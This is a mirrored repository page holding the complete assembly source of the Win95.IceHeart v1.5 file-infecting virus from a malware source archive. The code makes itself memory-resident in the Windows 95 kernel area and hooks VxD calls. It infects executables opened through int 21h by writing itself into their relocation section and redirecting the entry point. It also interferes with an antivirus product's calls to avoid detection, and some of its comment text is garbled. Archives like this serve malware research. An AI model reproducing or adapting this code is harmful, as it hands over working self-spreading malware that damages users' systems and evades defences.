mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 22:45:27 +00:00
286 lines
4.6 KiB
NASM
286 lines
4.6 KiB
NASM
|
;last review 29.06.1999
|
|||
|
|
|||
|
;"<22>?<3F> <20>? ??<3F><>? - ??? <20>?<3F>..."
|
|||
|
;Win95.IceHeart v1.5
|
|||
|
;(c) 1998-xxxx Stainless Steel Rat /2Rats /RVA /IkX
|
|||
|
jumps
|
|||
|
.386
|
|||
|
.model flat,stdcall
|
|||
|
|
|||
|
extrn ExitProcess:PROC
|
|||
|
.code
|
|||
|
start:
|
|||
|
_start:
|
|||
|
cld
|
|||
|
call _Next
|
|||
|
_Next:
|
|||
|
pop esi
|
|||
|
sub esi,offset _Next
|
|||
|
push ebp
|
|||
|
cmp byte ptr [esp+3+4],0BFh
|
|||
|
jne _ExitNow;NT
|
|||
|
mov ebp,_krnl_begin+178h+0Ch-40
|
|||
|
_DoSearchSection:
|
|||
|
add ebp,40
|
|||
|
mov edx,[ebp];first rva
|
|||
|
test edx,edx
|
|||
|
jz _ExitNow
|
|||
|
cmp dword ptr [ebp+24h-0Ch],0D0000040h;attr
|
|||
|
jne _DoSearchSection
|
|||
|
mov eax,[ebp+0Ch+40-0Ch];second rva
|
|||
|
mov ebx,eax
|
|||
|
sub eax,edx;rva delta
|
|||
|
sub eax,[ebp+8-0Ch];virtual size
|
|||
|
cmp ah,(virlen_in_mem/256)+1
|
|||
|
jb _DoSearchSection
|
|||
|
;in ebx second rva
|
|||
|
;in edx virtual size
|
|||
|
_SectionForUs:
|
|||
|
sub ebx,eax
|
|||
|
lea edi,[_krnl_begin+ebx]
|
|||
|
|
|||
|
lea ebp,[edi+offset _SecondStart-offset _start]
|
|||
|
pusha
|
|||
|
lea esi,[esi+offset _start]
|
|||
|
|
|||
|
_ResidencyCheck:
|
|||
|
xor ecx,ecx
|
|||
|
cmp byte ptr [edi],cl
|
|||
|
jne _ExitNow2
|
|||
|
mov ch,(virlen_in_mem/256)+1
|
|||
|
rep movsb
|
|||
|
call ebp
|
|||
|
_ExitNow2:
|
|||
|
popa
|
|||
|
_ExitNow:
|
|||
|
pop ebp
|
|||
|
jmp dword ptr [offset _old_eip+esi]
|
|||
|
|
|||
|
_SecondStart:
|
|||
|
mov esi,dword ptr ds:[_krnl_begin+_1st_export+0Ah]
|
|||
|
sub ebp,offset _SecondStart
|
|||
|
lea edi,[offset _old_vxd_call+ebp]
|
|||
|
push esi
|
|||
|
movsd
|
|||
|
movsw
|
|||
|
lea eax,[ebp+offset _Handler]
|
|||
|
pop edi
|
|||
|
stosd
|
|||
|
mov ax,cs
|
|||
|
stosw
|
|||
|
_InitSomeVars:
|
|||
|
mov dword ptr [offset _RelocFix+ebp+1],ebp
|
|||
|
lea eax,[offset _old_vxd_call+ebp]
|
|||
|
mov dword ptr [ebp+offset _JmpFword+2],eax
|
|||
|
retn
|
|||
|
|
|||
|
_Handler:
|
|||
|
pusha
|
|||
|
_RelocFix:
|
|||
|
mov ebp,11223344h
|
|||
|
_CheckBusyFlag:
|
|||
|
lea ecx,[offset _busy_flag+ebp]
|
|||
|
xor edx,edx
|
|||
|
cmp byte ptr [ecx],dl
|
|||
|
jne _Exit_Handler
|
|||
|
mov dl,0C0h
|
|||
|
cmp eax,2A0040h;id of DeviceIoControl
|
|||
|
jne _CheckInt21Call
|
|||
|
_CheckAvpCalls:
|
|||
|
cmp word ptr [edx+esp+2],22h
|
|||
|
jne _Exit_Handler
|
|||
|
not dword ptr [edx+esp];i think, avp likes api code,like this ;)
|
|||
|
|
|||
|
_CheckInt21Call:
|
|||
|
cmp eax,2A0010h;calling int 21h ?
|
|||
|
jne _Exit_Handler
|
|||
|
cmp word ptr [esp+44],716Ch;openfile ?
|
|||
|
je _Infect_It
|
|||
|
|
|||
|
_Exit_Handler:
|
|||
|
popa
|
|||
|
_JmpFword:
|
|||
|
jmp fword ptr ds:[offset _old_vxd_call]
|
|||
|
|
|||
|
_Infect_It:
|
|||
|
|
|||
|
not byte ptr [ecx]
|
|||
|
mov edi,esi
|
|||
|
xor eax,eax
|
|||
|
cld
|
|||
|
push ecx
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
mov ecx,esp
|
|||
|
repnz scasb
|
|||
|
pop ecx
|
|||
|
|
|||
|
mov eax,dword ptr [edi-5]
|
|||
|
or eax,20202000h
|
|||
|
cmp eax,'exe.'
|
|||
|
; cmp eax,'eci.'
|
|||
|
|
|||
|
|
|||
|
jne _ExitInfector
|
|||
|
_InfectFile:
|
|||
|
xor byte ptr [offset _Name+4+ebp],13
|
|||
|
|
|||
|
_AllocStack:
|
|||
|
mov ch,4;1024
|
|||
|
sub esp,ecx
|
|||
|
push ecx
|
|||
|
_OpenFile:
|
|||
|
xor edi,edi
|
|||
|
xor eax,eax
|
|||
|
cdq
|
|||
|
|
|||
|
inc edx
|
|||
|
mov ebx,edx
|
|||
|
inc ebx
|
|||
|
mov ax,716Ch
|
|||
|
call _Int21h
|
|||
|
xchg eax,ebx
|
|||
|
jc _FreeStack
|
|||
|
mov ah,3Fh
|
|||
|
call _Process_1024b
|
|||
|
cmp ecx,eax
|
|||
|
jne _CloseJmp
|
|||
|
mov eax,[edi+3Ch]
|
|||
|
shr ecx,1
|
|||
|
cmp eax,ecx
|
|||
|
jae _CloseJmp
|
|||
|
add edi,eax
|
|||
|
mov eax,[edi]
|
|||
|
inc eax;heuristics sucks
|
|||
|
cmp ax,'EP'+1;sign
|
|||
|
jne _CloseJmp
|
|||
|
cmp byte ptr [edi+61h],7Dh;winzip's sfx stack size
|
|||
|
je _CloseJmp
|
|||
|
_CheckAlreadyInfected:
|
|||
|
|
|||
|
|
|||
|
cmp byte ptr [edi+1Ah],al
|
|||
|
je _CloseJmp
|
|||
|
mov byte ptr [edi+1Ah],al
|
|||
|
test byte ptr [edi+23],22h;dll or fixed image
|
|||
|
jne _CloseJmp
|
|||
|
mov byte ptr [edi+23],0;strip reloc
|
|||
|
mov edx,dword ptr [edi+160];fixup section
|
|||
|
test edx,edx
|
|||
|
je _CloseJmp
|
|||
|
push edx
|
|||
|
xchg dword ptr [edi+40],edx;entry point
|
|||
|
add edx,dword ptr [edi+48+4];image base
|
|||
|
mov dword ptr [offset _old_eip+ebp],edx
|
|||
|
pop edx
|
|||
|
|
|||
|
_AnalyzePlaceInFixupArea:
|
|||
|
|
|||
|
mov ecx,[edi+6]
|
|||
|
lea esi,[edi+0F8h+12];rva
|
|||
|
|
|||
|
_DoAnalyzeSections:
|
|||
|
lodsd
|
|||
|
cmp eax,edx;search section with rva=fixup rva
|
|||
|
je _OkiFixupOur
|
|||
|
add esi,40-4
|
|||
|
loop _DoAnalyzeSections
|
|||
|
_CloseJmp:
|
|||
|
jmp _Close
|
|||
|
_OkiFixupOur:
|
|||
|
lodsd;phys size
|
|||
|
mov edx,virlen
|
|||
|
cmp eax,edx
|
|||
|
jb _CloseJmp
|
|||
|
mov dword ptr [esi-12],edx
|
|||
|
push edx
|
|||
|
lodsd;phyz ofs
|
|||
|
|
|||
|
|
|||
|
_Int21CallOptimization:
|
|||
|
lea esi,[ebp+offset _Int21h]
|
|||
|
|
|||
|
|
|||
|
_SeekToEnd:
|
|||
|
|
|||
|
push eax
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
mov ax,4200h
|
|||
|
call esi
|
|||
|
|
|||
|
_WriteSelf:
|
|||
|
mov ah,40h
|
|||
|
lea edx,[ebp+offset _start]
|
|||
|
pop ecx
|
|||
|
call esi
|
|||
|
|
|||
|
_WriteHeader:
|
|||
|
xor eax,eax
|
|||
|
mov ah,42h
|
|||
|
cdq
|
|||
|
call esi
|
|||
|
|
|||
|
mov ah,40h
|
|||
|
call _Process_1024b
|
|||
|
|
|||
|
_Close:
|
|||
|
mov ah,3Eh
|
|||
|
call _Int21h
|
|||
|
|
|||
|
_FreeStack:
|
|||
|
pop ecx
|
|||
|
add esp,ecx
|
|||
|
|
|||
|
_ExitInfector:
|
|||
|
pop ecx
|
|||
|
not byte ptr [ecx]
|
|||
|
jmp _Exit_Handler
|
|||
|
|
|||
|
|
|||
|
_Process_1024b:
|
|||
|
lea edi,[esp+4+4]
|
|||
|
xor ecx,ecx
|
|||
|
mov ch,4;1024
|
|||
|
mov edx,edi
|
|||
|
_Int21h:
|
|||
|
push ecx
|
|||
|
push ebp
|
|||
|
push ecx eax
|
|||
|
push 2A0010h
|
|||
|
mov ebp,_krnl_begin+_1st_export
|
|||
|
call ebp
|
|||
|
pop ebp
|
|||
|
pop ecx
|
|||
|
retn
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_Name db 'Win95.iCE-hEART',0
|
|||
|
_Msg db '? ? ?? , ? ???? ??<3F>?<3F><><EFBFBD> <20>??<3F>? !',0
|
|||
|
|
|||
|
_old_eip dd offset ExitProcess
|
|||
|
virlen equ $-offset start
|
|||
|
_old_vxd_call db 6 dup ('')
|
|||
|
_busy_flag db ''
|
|||
|
virlen_in_mem equ $-offset start
|
|||
|
|
|||
|
ends
|
|||
|
|
|||
|
.data
|
|||
|
db 13,10
|
|||
|
|
|||
|
_krnl_begin equ 0BFF70000h
|
|||
|
_1st_export equ 13D4h
|
|||
|
end start
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|